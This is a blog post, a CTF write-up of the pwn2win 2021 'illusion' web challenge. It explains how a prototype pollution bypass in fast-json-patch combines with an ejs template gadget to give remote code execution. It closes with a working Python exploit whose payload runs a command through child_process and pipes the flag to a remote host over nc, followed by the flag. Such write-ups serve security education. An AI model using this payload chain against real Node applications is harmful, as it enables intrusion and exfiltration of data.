<!DOCTYPE HTML>
<html>
<head>
  <meta charset="utf-8">
  
  <title>illusion - pwn2win 2021 | 1n73rc3p70r-B10g | Welcome to MY Blog</title>

  
  <meta name="author" content="Sayooj B Kumar">
  

  
  <meta name="description" content="place where i post my findings,ctf write-ups">
  

  
  
  <meta name="keywords" content="RCE,Prototype pollution">
  

  <meta id="viewport" name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, minimal-ui">
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black">

  <meta property="og:title" content="illusion - pwn2win 2021"/>

  <meta property="og:site_name" content="1n73rc3p70r-B10g"/>

  
  <meta property="og:image" content="/blog/favicon.ico"/>
  

  <link href="/blog/favicon.ico" rel="icon">
  <link rel="alternate" href="/blog/atom.xml" title="1n73rc3p70r-B10g" type="application/atom+xml">
  <link rel="stylesheet" href="/blog/css/style.css" media="screen" type="text/css">
<meta name="generator" content="Hexo 5.4.0"></head>


<body>
<div class="blog">
  <div class="content">

    <header>
  <div class="site-branding">
    <h1 class="site-title">
      <a href="/blog/">1n73rc3p70r-B10g</a>
    </h1>
    <p class="site-description">Welcome to MY Blog</p>
  </div>
  <nav class="site-navigation">
    <ul>
      
    </ul>
  </nav>
</header>

    <main class="site-main posts-loop">
    <article>

  
    
    <h3 class="article-title"><span>illusion - pwn2win 2021</span></h3>
    
  

  <div class="article-top-meta">
    <span class="posted-on">
      <a href="/blog/2021/06/03/illusion-pwn2win2021/" rel="bookmark">
        <time class="entry-date published" datetime="2021-06-03T13:02:20.000Z">
          2021-06-03
        </time>
      </a>
    </span>
  </div>


  

  <div class="article-content">
    <div class="entry">
      
        <p><strong>tl;dr</strong></p>
<ul>
<li>Using Prototype pollution vulnerablity in fast-json-patch pollute value in outputFunctionName </li>
<li>Get a shell as the flag can only be obtained using binary file </li>
</ul>
<span id="more"></span>

<p><strong>No. Of Solves:</strong> 78</p>
<p><strong>Challenge points:</strong> 151</p>
<p><strong>Solved By:</strong> <a target="_blank" rel="noopener" href="https://twitter.com/_1nt3rc3pt0r_">1nt3rc3pt0r</a>, <a target="_blank" rel="noopener" href="https://twitter.com/captainkay11">Captain-Kay</a></p>
<h2 id="Challenge-Description"><a href="#Challenge-Description" class="headerlink" title="Challenge Description"></a>Challenge Description</h2><p>Laura just found a website used for monitoring security mechanisms on Rhiza’s state and is planning to hack into it to forge the status of these security services. After that she will desactivate these security resources without alerting government agents. Your goal is to get into the server to change the monitoring service behavior.</p>
<p><strong>Source Code:</strong> <a href="source-code.zip">here</a></p>
<h2 id="Analysis"><a href="#Analysis" class="headerlink" title="Analysis"></a>Analysis</h2><p>We have a list of service and status in <code>index.js</code>.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">let services = &#123;</span><br><span class="line">    status: &quot;online&quot;,</span><br><span class="line">    cameras: &quot;online&quot;,</span><br><span class="line">    doors: &quot;online&quot;,</span><br><span class="line">    dome: &quot;online&quot;,</span><br><span class="line">    turrets: &quot;online&quot;</span><br><span class="line">   &#125;</span><br><span class="line">   app.use(&quot;/static&quot;, express.static(__dirname + &quot;/static&quot;));</span><br><span class="line">   app.get(&quot;/&quot;, async (req, res) =&gt; &#123;</span><br><span class="line">       const html = await ejs.renderFile(__dirname + &quot;/templates/index.ejs&quot;, &#123;services&#125;)</span><br><span class="line">       res.end(html)</span><br><span class="line">   &#125;)</span><br></pre></td></tr></table></figure>

<p>End point <code>/change_status</code> is used to update status of services ,this is done with help of package called <code>fast-json-patch</code>. </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">app.post(&quot;/change_status&quot;, (req, res) =&gt; &#123;</span><br><span class="line">    console.log(&quot;changing status&quot;)</span><br><span class="line">    let patch = []</span><br><span class="line">    console.log(req.body);</span><br><span class="line">    Object.entries(req.body).forEach(([service, status]) =&gt; &#123;</span><br><span class="line"></span><br><span class="line">        if (service === &quot;status&quot;)&#123;</span><br><span class="line">            res.status(400).end(&quot;Cannot change all services status&quot;)</span><br><span class="line">            return</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        patch.push(&#123;</span><br><span class="line">            &quot;op&quot;: &quot;replace&quot;,</span><br><span class="line">            &quot;path&quot;: &quot;/&quot; + service,</span><br><span class="line">            &quot;value&quot;: status</span><br><span class="line">        &#125;)</span><br><span class="line">    &#125;);</span><br></pre></td></tr></table></figure>

<p><code>fast-json-patch</code> initially had vulnerablity regarding <em>Prototype pollution</em> and it was said to be fixed in the current version that we use in challenge.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">if (banPrototypeModifications &amp;&amp; key == &#x27;__proto__&#x27;) &#123;</span><br><span class="line">                throw new TypeError(&#x27;JSON-Patch: modifying `__proto__` prop is banned for security reasons, if this was on purpose, please set `banPrototypeModifications` flag false and pass it to this function. More info in fast-json-patch README&#x27;);</span><br><span class="line">            &#125;</span><br></pre></td></tr></table></figure>

<p>Patch was not good enough to prevent Prototype pollution as they check for existance of <code>__proto__</code> there still exist a chance for Prototype pollution using <code>prototype</code> <a target="_blank" rel="noopener" href="https://github.com/Starcounter-Jack/JSON-Patch/pull/262">Check Here</a></p>
<h2 id="Solution"><a href="#Solution" class="headerlink" title="Solution"></a>Solution</h2><p>Now we can overwrite values as we need  using <code>constructor/prototype/&lt;variable&gt;</code>.</p>
<h3 id="RCE-using-Prototype-pollution"><a href="#RCE-using-Prototype-pollution" class="headerlink" title="RCE using Prototype pollution"></a>RCE using Prototype pollution</h3><p>we have ejs as template engine and injecting code to <code>outputFunctionName</code> in <code>ejs.js</code> can lead to RCE <a target="_blank" rel="noopener" href="https://github.com/mde/ejs/issues/451">Check Here</a> </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">if (opts.outputFunctionName) &#123;</span><br><span class="line">  prepended += &#x27;  var &#x27; + opts.outputFunctionName + &#x27; = __append;&#x27; + &#x27;\n&#x27;;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h2 id="Exploit-Script"><a href="#Exploit-Script" class="headerlink" title="Exploit Script"></a>Exploit Script</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line"></span><br><span class="line">TARGET_URL = &#x27;http://illusion.pwn2win.party:23121&#x27;</span><br><span class="line">head=&#123;&quot;Authorization&quot;:&quot;Basic YWRtaW46cWpoeXFwZWJ4ZW12dnF1cg==&quot;&#125;// change</span><br><span class="line"></span><br><span class="line">r=requests.post(TARGET_URL + &#x27;/change_status&#x27;,json=&#123;&quot;constructor/prototype/outputFunctionName&quot;:&quot;a; return process.mainModule.require(&#x27;child_process&#x27;).execSync(&#x27;./readflag|nc &lt;ip&gt; &lt;port&gt;&#x27;); //&quot;&#125;,headers=head)</span><br><span class="line">print(r.text)</span><br><span class="line"></span><br><span class="line">r=requests.get(TARGET_URL,headers=head)</span><br><span class="line">print(r.text)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="Flag"><a href="#Flag" class="headerlink" title="Flag"></a>Flag</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">CTF-BR&#123;d0nt_miX_pr0totyPe_pol1ution_w1th_a_t3mplat3_3ng1nE!&#125;</span><br></pre></td></tr></table></figure>








      
    </div>

  </div>

  <div class="article-footer">
    <div class="article-meta pull-left">

    
      

    <span class="post-categories">
      <i class="icon-categories"></i>
        <a href="/blog/categories/Web-Exploitation/">Web Exploitation</a>
    </span>
    

    
    

    <span class="post-tags">
      <i class="icon-tags"></i>
        <a href="/blog/tags/RCE/">RCE</a><a href="/blog/tags/Prototype-pollution/">Prototype pollution</a>
    </span>
    

    </div>

    
  </div>
</article>

  






    </main>

    <footer class="site-footer">
  <p class="site-info">
    Proudly powered by <a href="https://hexo.io/" target="_blank">Hexo</a> and
    Theme by <a href="https://github.com/CodeDaraW/Hacker" target="_blank">Hacker</a>
    </br>
    
    &copy; 2021 Sayooj B Kumar
    
  </p>
</footer>
    
    
  </div>
</div>
</body>
</html>